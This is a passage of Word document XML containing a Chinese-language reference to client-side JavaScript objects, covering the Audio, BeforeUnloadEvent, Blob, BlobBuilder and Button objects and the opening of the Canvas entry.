    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>string value</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>属性的值。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="788" w:name="Audio"/>
      <w:r>
        <w:t>Audio</w:t>
      </w:r>
      <w:bookmarkEnd w:id="788"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>audio</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Node</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>Element</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>MediaElement</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>音频（</w:t>
      </w:r>
      <w:r>
        <w:t>Audio</w:t>
      </w:r>
      <w:r>
        <w:t>）对象表示一个</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>的＜</w:t>
      </w:r>
      <w:r>
        <w:t>audio</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素。除了构造函数外，</w:t>
      </w:r>
      <w:r>
        <w:t>Audio</w:t>
      </w:r>
      <w:r>
        <w:t>对象的所有属性、方法及事件处理程序都继承自</w:t>
      </w:r>
      <w:r>
        <w:t>MediaElement</w:t>
      </w:r>
      <w:r>
        <w:t>。</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Audio([string src])</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>构造函数创建一个新的＜</w:t>
      </w:r>
      <w:r>
        <w:t>audio</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素，其</w:t>
      </w:r>
      <w:r>
        <w:t>preload</w:t>
      </w:r>
      <w:r>
        <w:t>属性为</w:t>
      </w:r>
      <w:r>
        <w:t>"auto"</w:t>
      </w:r>
      <w:r>
        <w:t>。如果指定</w:t>
      </w:r>
      <w:r>
        <w:t>src</w:t>
      </w:r>
      <w:r>
        <w:t>参数，它将用做</w:t>
      </w:r>
      <w:r>
        <w:t>src</w:t>
      </w:r>
      <w:r>
        <w:t>属性的值。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="789" w:name="BeforeUnloadEvent"/>
      <w:r>
        <w:t>BeforeUnloadEvent</w:t>
      </w:r>
      <w:bookmarkEnd w:id="789"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>用于卸载事件的</w:t>
      </w:r>
      <w:r>
        <w:t>Event</w:t>
      </w:r>
      <w:r>
        <w:t>对象</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Event</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>浏览器跳转到一个新的文档之前，</w:t>
      </w:r>
      <w:r>
        <w:t>Window</w:t>
      </w:r>
      <w:r>
        <w:t>对象</w:t>
      </w:r>
      <w:r>
        <w:t>上的卸载事件会被触发，</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>应用可在此时询问用户是否真的要离开当前页面。传给卸载事件处理函数的是</w:t>
      </w:r>
      <w:r>
        <w:t>BeforeUnloadEvent</w:t>
      </w:r>
      <w:r>
        <w:t>对象。如果你想让用户确认是否真的要离开当前页面，不需要也不应该使用</w:t>
      </w:r>
      <w:r>
        <w:t>Window.confirm()</w:t>
      </w:r>
      <w:r>
        <w:t>方法，而应该从事件处理程序返回一个字符串，或者将事件对象的</w:t>
      </w:r>
      <w:r>
        <w:t>returnValue</w:t>
      </w:r>
      <w:r>
        <w:t>设置为一个字符串。返回或设置的字符串将以确认对话框的形式展现给用户。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>可参考</w:t>
      </w:r>
      <w:r>
        <w:t>Event</w:t>
      </w:r>
      <w:r>
        <w:t>及</w:t>
      </w:r>
      <w:r>
        <w:t>Window</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string returnValue</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>在离开当前页面之前以确认对话框的形式向用户显示的消息。如</w:t>
      </w:r>
      <w:r>
        <w:t>果不想显示确认对话框，可保持此属性为未设置。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="790" w:name="Blob"/>
      <w:r>
        <w:t>Blob</w:t>
      </w:r>
      <w:bookmarkEnd w:id="790"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>一个不透明的数据块，如文件内容等</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Blob</w:t>
      </w:r>
      <w:r>
        <w:t>是一个不透明的类型，用于在</w:t>
      </w:r>
      <w:r>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:t>之间交换数据。</w:t>
      </w:r>
      <w:r>
        <w:t>Blob</w:t>
      </w:r>
      <w:r>
        <w:t>可能会非常大，可能表示二进制数据，不过也不一定是这样。</w:t>
      </w:r>
      <w:r>
        <w:t>Blob</w:t>
      </w:r>
      <w:r>
        <w:t>通常保存在文件中，不过这只是实现细节。</w:t>
      </w:r>
      <w:r>
        <w:t>Blob</w:t>
      </w:r>
      <w:r>
        <w:t>只对外暴露尺寸，有</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>时也有</w:t>
      </w:r>
      <w:r>
        <w:t>MIME</w:t>
      </w:r>
      <w:r>
        <w:t>类型（</w:t>
      </w:r>
      <w:r>
        <w:t>MIME type</w:t>
      </w:r>
      <w:r>
        <w:t>），只定义一个将</w:t>
      </w:r>
      <w:r>
        <w:t>Blob</w:t>
      </w:r>
      <w:r>
        <w:t>的一部分作为一个</w:t>
      </w:r>
      <w:r>
        <w:t>Blob</w:t>
      </w:r>
      <w:r>
        <w:t>处理的方法。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>很多</w:t>
      </w:r>
      <w:r>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:t>都使用</w:t>
      </w:r>
      <w:r>
        <w:t>Blob</w:t>
      </w:r>
      <w:r>
        <w:t>：可参见</w:t>
      </w:r>
      <w:r>
        <w:t>FileReader</w:t>
      </w:r>
      <w:r>
        <w:t>中读取</w:t>
      </w:r>
      <w:r>
        <w:t>Blob</w:t>
      </w:r>
      <w:r>
        <w:t>内容的方法，</w:t>
      </w:r>
      <w:r>
        <w:t>BlobBuilder</w:t>
      </w:r>
      <w:r>
        <w:t>中创建一个新</w:t>
      </w:r>
      <w:r>
        <w:t>Blob</w:t>
      </w:r>
      <w:r>
        <w:t>对象的方法，</w:t>
      </w:r>
      <w:r>
        <w:t>XMLHttpRequest</w:t>
      </w:r>
      <w:r>
        <w:t>中下载及上传</w:t>
      </w:r>
      <w:r>
        <w:t>Blob</w:t>
      </w:r>
      <w:r>
        <w:t>的方法。关于</w:t>
      </w:r>
      <w:r>
        <w:t>Blob</w:t>
      </w:r>
      <w:r>
        <w:t>以及用到它的</w:t>
      </w:r>
      <w:r>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:t>的讨论，可参考</w:t>
      </w:r>
      <w:r>
        <w:t>22.6</w:t>
      </w:r>
      <w:r>
        <w:t>节。</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size</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Blob</w:t>
      </w:r>
      <w:r>
        <w:t>的长度，单位为字节。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>readonly string type</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Blob</w:t>
      </w:r>
      <w:r>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:t>MIME</w:t>
      </w:r>
      <w:r>
        <w:t>类型，如果未指定则为空字符串。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>方法</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Blob slice(unsigned long start,unsigne</w:t>
      </w:r>
      <w:r>
        <w:t>d long length,[string contentType])</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>返回一个新的</w:t>
      </w:r>
      <w:r>
        <w:t>Blob</w:t>
      </w:r>
      <w:r>
        <w:t>，表示当前</w:t>
      </w:r>
      <w:r>
        <w:t>Blob</w:t>
      </w:r>
      <w:r>
        <w:t>中从</w:t>
      </w:r>
      <w:r>
        <w:t>start</w:t>
      </w:r>
      <w:r>
        <w:t>开始，长度为</w:t>
      </w:r>
      <w:r>
        <w:t>length</w:t>
      </w:r>
      <w:r>
        <w:t>的字节。如果指定</w:t>
      </w:r>
      <w:r>
        <w:t>contentType</w:t>
      </w:r>
      <w:r>
        <w:t>，它将用做返回的</w:t>
      </w:r>
      <w:r>
        <w:t>Blob</w:t>
      </w:r>
      <w:r>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:t>type</w:t>
      </w:r>
      <w:r>
        <w:t>属性。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="791" w:name="BlobBuilder"/>
      <w:r>
        <w:t>BlobBuilder</w:t>
      </w:r>
      <w:bookmarkEnd w:id="791"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>创建新的</w:t>
      </w:r>
      <w:r>
        <w:t>Blob</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>BlobBuilder</w:t>
      </w:r>
      <w:r>
        <w:t>对象用于从文本字符串、</w:t>
      </w:r>
      <w:r>
        <w:t>ArrayBuffer</w:t>
      </w:r>
      <w:r>
        <w:t>对象的字节内容以及其他</w:t>
      </w:r>
      <w:r>
        <w:t>Blob</w:t>
      </w:r>
      <w:r>
        <w:t>创建新的</w:t>
      </w:r>
      <w:r>
        <w:t>Blob</w:t>
      </w:r>
      <w:r>
        <w:t>对象。要构建一个</w:t>
      </w:r>
      <w:r>
        <w:t>Blob</w:t>
      </w:r>
      <w:r>
        <w:t>，可以创建一个</w:t>
      </w:r>
      <w:r>
        <w:t>BlobBuilder</w:t>
      </w:r>
      <w:r>
        <w:t>，调用</w:t>
      </w:r>
      <w:r>
        <w:t>append()</w:t>
      </w:r>
      <w:r>
        <w:t>一次或多次，然后调用</w:t>
      </w:r>
      <w:r>
        <w:t>getBlob()</w:t>
      </w:r>
      <w:r>
        <w:t>，即可得到</w:t>
      </w:r>
      <w:r>
        <w:t>一个</w:t>
      </w:r>
      <w:r>
        <w:t>Blob</w:t>
      </w:r>
      <w:r>
        <w:t>。</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BlobBuilder()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>调用</w:t>
      </w:r>
      <w:r>
        <w:t>BlobBuilder()</w:t>
      </w:r>
      <w:r>
        <w:t>构造函数，无需参数，即可创建一个新的</w:t>
      </w:r>
      <w:r>
        <w:t>BlobBuilder</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void append(string text,[string endings])</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>使用</w:t>
      </w:r>
      <w:r>
        <w:t>UTF-8</w:t>
      </w:r>
      <w:r>
        <w:t>编码将指定的</w:t>
      </w:r>
      <w:r>
        <w:t>text</w:t>
      </w:r>
      <w:r>
        <w:t>追加到正在创建的</w:t>
      </w:r>
      <w:r>
        <w:t>Blob</w:t>
      </w:r>
      <w:r>
        <w:t>中。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>void append(Blob data)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>追加指定</w:t>
      </w:r>
      <w:r>
        <w:t>Blob data</w:t>
      </w:r>
      <w:r>
        <w:t>的内容到正在创建的</w:t>
      </w:r>
      <w:r>
        <w:t>Blob</w:t>
      </w:r>
      <w:r>
        <w:t>中。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>void append(ArrayBuffer data)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>追加</w:t>
      </w:r>
      <w:r>
        <w:t>ArrayBuffer data</w:t>
      </w:r>
      <w:r>
        <w:t>的字</w:t>
      </w:r>
      <w:r>
        <w:t>节内容到正在创建的</w:t>
      </w:r>
      <w:r>
        <w:t>Blob</w:t>
      </w:r>
      <w:r>
        <w:t>中。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Blob getBlob([string contentType])</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>返回一个</w:t>
      </w:r>
      <w:r>
        <w:t>Blob</w:t>
      </w:r>
      <w:r>
        <w:t>，表示自这个</w:t>
      </w:r>
      <w:r>
        <w:t>BlobBuilder</w:t>
      </w:r>
      <w:r>
        <w:t>创建之后追加的所有数据。每次调用这个方法都将返回一个新的</w:t>
      </w:r>
      <w:r>
        <w:t>Blob</w:t>
      </w:r>
      <w:r>
        <w:t>。参数</w:t>
      </w:r>
      <w:r>
        <w:t>contentType</w:t>
      </w:r>
      <w:r>
        <w:t>对应返回的</w:t>
      </w:r>
      <w:r>
        <w:t>Blob</w:t>
      </w:r>
      <w:r>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:t>type</w:t>
      </w:r>
      <w:r>
        <w:t>属性的值，如果未指定，返回的</w:t>
      </w:r>
      <w:r>
        <w:t>Blob</w:t>
      </w:r>
      <w:r>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:t>type</w:t>
      </w:r>
      <w:r>
        <w:t>属性将是一个空字符串。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="792" w:name="Button"/>
      <w:r>
        <w:t>Button</w:t>
      </w:r>
      <w:bookmarkEnd w:id="792"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>button</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Node</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>Element</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>FormControl</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Button</w:t>
      </w:r>
      <w:r>
        <w:t>对象表现为</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>button</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素。</w:t>
      </w:r>
      <w:r>
        <w:t>Button</w:t>
      </w:r>
      <w:r>
        <w:t>的大多数属性</w:t>
      </w:r>
      <w:r>
        <w:t>及方法都在</w:t>
      </w:r>
      <w:r>
        <w:t>FormControl</w:t>
      </w:r>
      <w:r>
        <w:t>及</w:t>
      </w:r>
      <w:r>
        <w:t>Element</w:t>
      </w:r>
      <w:r>
        <w:t>中介绍了。如果一个</w:t>
      </w:r>
      <w:r>
        <w:t>Button</w:t>
      </w:r>
      <w:r>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:t>type</w:t>
      </w:r>
      <w:r>
        <w:t>属性（见</w:t>
      </w:r>
      <w:r>
        <w:t>FormControl</w:t>
      </w:r>
      <w:r>
        <w:t>）是</w:t>
      </w:r>
      <w:r>
        <w:t>"submit"</w:t>
      </w:r>
      <w:r>
        <w:t>，下面列出的有关指定表单</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>提交参数的属性将覆盖</w:t>
      </w:r>
      <w:r>
        <w:t>Button</w:t>
      </w:r>
      <w:r>
        <w:t>所在表单（见</w:t>
      </w:r>
      <w:r>
        <w:t>FormControl</w:t>
      </w:r>
      <w:r>
        <w:t>）上的相似属性。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>属性</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>以下属性只在＜</w:t>
      </w:r>
      <w:r>
        <w:t>button</w:t>
      </w:r>
      <w:r>
        <w:t>＞的</w:t>
      </w:r>
      <w:r>
        <w:t>type</w:t>
      </w:r>
      <w:r>
        <w:t>为</w:t>
      </w:r>
      <w:r>
        <w:t>"submit"</w:t>
      </w:r>
      <w:r>
        <w:t>时有意义。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>string formAction</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>这个属性反映对应的</w:t>
      </w:r>
      <w:r>
        <w:t>formaction HTML</w:t>
      </w:r>
      <w:r>
        <w:t>属性。对提交按钮而言，它将覆盖表单的</w:t>
      </w:r>
      <w:r>
        <w:t>action</w:t>
      </w:r>
      <w:r>
        <w:t>属性。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>string formEnctype</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>这个属性反映对应的</w:t>
      </w:r>
      <w:r>
        <w:t>formenctype HTML</w:t>
      </w:r>
      <w:r>
        <w:t>属性。对提交按钮而言，它将覆盖表单的</w:t>
      </w:r>
      <w:r>
        <w:t>enctype</w:t>
      </w:r>
      <w:r>
        <w:t>属性，它的合法值与表单的</w:t>
      </w:r>
      <w:r>
        <w:t>enctype</w:t>
      </w:r>
      <w:r>
        <w:t>属性的合法值相同。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>string formMethod</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>这个属性反映对应的</w:t>
      </w:r>
      <w:r>
        <w:t>formmethod HTML</w:t>
      </w:r>
      <w:r>
        <w:t>属性。对提交按钮而言，它将覆盖表单的</w:t>
      </w:r>
      <w:r>
        <w:t>method</w:t>
      </w:r>
      <w:r>
        <w:t>属性。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>string formNoValidate</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>这个属性反映对应的</w:t>
      </w:r>
      <w:r>
        <w:t>formnovalidate HTML</w:t>
      </w:r>
      <w:r>
        <w:t>属性。对提交按钮而言，它将覆盖表单的</w:t>
      </w:r>
      <w:r>
        <w:t>noValidate</w:t>
      </w:r>
      <w:r>
        <w:t>属性。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>string formTarget</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>这个属性反映对</w:t>
      </w:r>
      <w:r>
        <w:t>应的</w:t>
      </w:r>
      <w:r>
        <w:t>formtarget HTML</w:t>
      </w:r>
      <w:r>
        <w:t>属性。对提交按钮而言，它将覆盖表单的</w:t>
      </w:r>
      <w:r>
        <w:t>target</w:t>
      </w:r>
      <w:r>
        <w:t>属性。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="793" w:name="Canvas"/>
      <w:r>
        <w:t>Canvas</w:t>
      </w:r>
      <w:bookmarkEnd w:id="793"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>用于脚本绘图的</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
